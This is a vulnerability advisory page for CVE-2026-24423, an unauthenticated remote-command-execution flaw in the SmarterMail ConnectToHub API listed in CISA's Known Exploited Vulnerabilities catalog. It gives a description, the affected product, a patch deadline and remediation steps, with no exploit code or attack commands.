CVE-2026-24423

CISA KEV

Published February 5, 2026 · Updated April 3, 2026

high

What This Means

# CVE-2026-24423 — SmarterMail ConnectToHub API Authentication Bypass The ConnectToHub API method in SmarterTools SmarterMail lacks authentication controls, allowing unauthenticated attackers to redirect the mail server to a malicious HTTP server and execute arbitrary OS commands. This enables full server compromise without credentials. Patch SmarterMail immediately, restrict network access to the ConnectToHub API, and audit logs for suspicious hub connection attempts or unexpected command execution.

Official Description+

SmarterTools SmarterMail contains a missing authentication for critical function vulnerability in the ConnectToHub API method. This could allow the attacker to point the SmarterMail instance to a malicious HTTP server which serves the malicious OS command and could lead to command execution.

Affected Products

Vendor	Product
SmarterTools	SmarterMail

Patch Status

Patch by 2026-02-26

Recommended Actions

Check if your systems use any of the affected products listed above.
Apply vendor patches immediately if available.
This vulnerability is in CISA's Known Exploited Vulnerabilities catalog — prioritize remediation.
Monitor vendor advisories for updates and additional mitigations.
Review logs for indicators of compromise related to CVE-2026-24423.

Related Coverage

Vvulnerability

CVE-2026-24423: SmarterMail ConnectToHub API Exposes Servers to Unauthenticated Remote Code Execution

CVE-2026-24423 is a missing authentication vulnerability in the ConnectToHub API method of SmarterTools SmarterMail, allowing unauthenticated remote attackers to redirect the mail server to a malicious HTTP endpoint and execute arbitrary OS commands. Successful exploitation requires no credentials or user interaction and results in full server compromise. CISA has added the vulnerability to its Known Exploited Vulnerabilities catalog with a federal patch deadline of February 26, 2026.

CISA KEV·57d ago·3 min read